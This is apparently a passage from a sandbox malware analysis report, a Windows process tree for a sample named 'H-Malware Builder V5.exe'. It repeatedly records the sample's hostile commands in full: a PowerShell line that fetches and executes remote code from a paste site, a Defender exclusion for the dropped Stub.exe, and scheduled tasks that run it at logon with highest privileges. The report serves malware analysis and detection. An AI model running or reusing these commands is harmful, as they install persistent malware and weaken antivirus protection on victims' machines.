  C:\Windows\System32\dllhost.exe /Processid:{b49b82d5-0c85-463b-b0aa-f1cddf381ad9}
  2⤵
  PID:2376
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{24c676a3-8a40-4c1b-a6f2-7c32904d6323}
  2⤵
  PID:564
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{7a0008f3-dd69-49d6-b8a4-1a5767489ae5}
  2⤵
  PID:3060
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{1ac0c78b-cf62-4013-b11d-e7145f4a36d4}
  2⤵
  PID:1900
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{00f8baa4-ce20-4c0c-8d15-e0bbac4d8794}
  2⤵
  PID:588
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ee3e4642-1c1f-4c05-b1a4-cf95071834fe}
  2⤵
  PID:2780
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{99b183fd-0851-4b12-a75c-9c0cd22c6cac}
  2⤵
  PID:1748
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9f10aece-cf57-4fdb-878f-5d6f8b0e1e24}
  2⤵
  PID:3016
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{cdfdd59a-e801-4dc3-a0e9-b05a4726ac2a}
  2⤵
  PID:1156

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:472
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:608
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe
    3⤵
    PID:1536
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:1636
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -Embedding
    3⤵
    PID:2616
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:684
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  PID:768
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:812
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1180
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:848
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:972
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:276
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:756
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1044
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1132
- C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
  2⤵
  PID:1308
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:2856
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:2640

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:488

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:496

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1260
- C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
  2⤵
  - Drops startup file
  - Suspicious use of WriteProcessMemory
  PID:1884
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2760
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2844
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3056
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2936
  - - C:\Windows\system32\SCHTASKS.exe
      "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
      4⤵
      PID:1648
  - - C:\Windows\system32\SCHTASKS.exe
      "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:988
- - C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
    3⤵
    - Drops startup file
    PID:2064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2680
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2252
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        5⤵
        
        PID:1552
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2160
    - - C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1532
    - - C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2320
  - - C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
      "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
      4⤵
      Drops startup file
      PID:1500
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2216
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2524
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        6⤵
        
        PID:2164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3048
      - C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        6⤵
        
        PID:2036
      - C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        6⤵
        
        PID:2656
    - - C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        5⤵
        Drops startup file
        
        PID:2700
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:600
      - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2992
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        7⤵
        
        PID:900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1896
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2512
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2468
      - C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        6⤵
        Drops startup file
        
        PID:2612
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3068
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2440
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        8⤵
        
        PID:2004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1212
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2744
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        8⤵
        
        PID:1708
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        7⤵
        Drops startup file
        
        PID:1500
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1064
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        8⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:1524
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        9⤵
        
        PID:2084
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        10⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2008
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2836
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2828
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        8⤵
        Drops startup file
        
        PID:644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2376
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        9⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2548
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        10⤵
        
        PID:1620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        11⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3060
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        10⤵
        
        PID:2980
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        9⤵
        Drops startup file
        
        PID:2272
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2072
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        10⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2116
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        11⤵
        
        PID:1760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        12⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:492
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1972
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1904
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        10⤵
        Drops startup file
        
        PID:2152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1620
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        11⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2000
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        12⤵
        
        PID:2076
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        13⤵
        
        PID:1692
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        12⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:536
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        12⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2492
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        11⤵
        Drops startup file
        
        PID:1512
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2352
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        12⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2476
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        13⤵
        
        PID:2084
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        14⤵
        
        PID:2260
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        13⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1100
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        13⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2316
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        12⤵
        Drops startup file
        
        PID:1164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2004
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        13⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2888
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        14⤵
        
        PID:1484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        15⤵
        
        PID:2336
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        14⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2508
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        14⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        13⤵
        Drops startup file
        
        PID:2224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:952
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        14⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2596
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        15⤵
        
        PID:2008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        16⤵
        
        PID:2584
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        15⤵
        
        PID:536
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        15⤵
        
        PID:1328
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        14⤵
        Drops startup file
        
        PID:900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1400
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        15⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2760
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        16⤵
        
        PID:2612
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        17⤵
        
        PID:1108
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        16⤵
        
        PID:2952
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        16⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2624
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
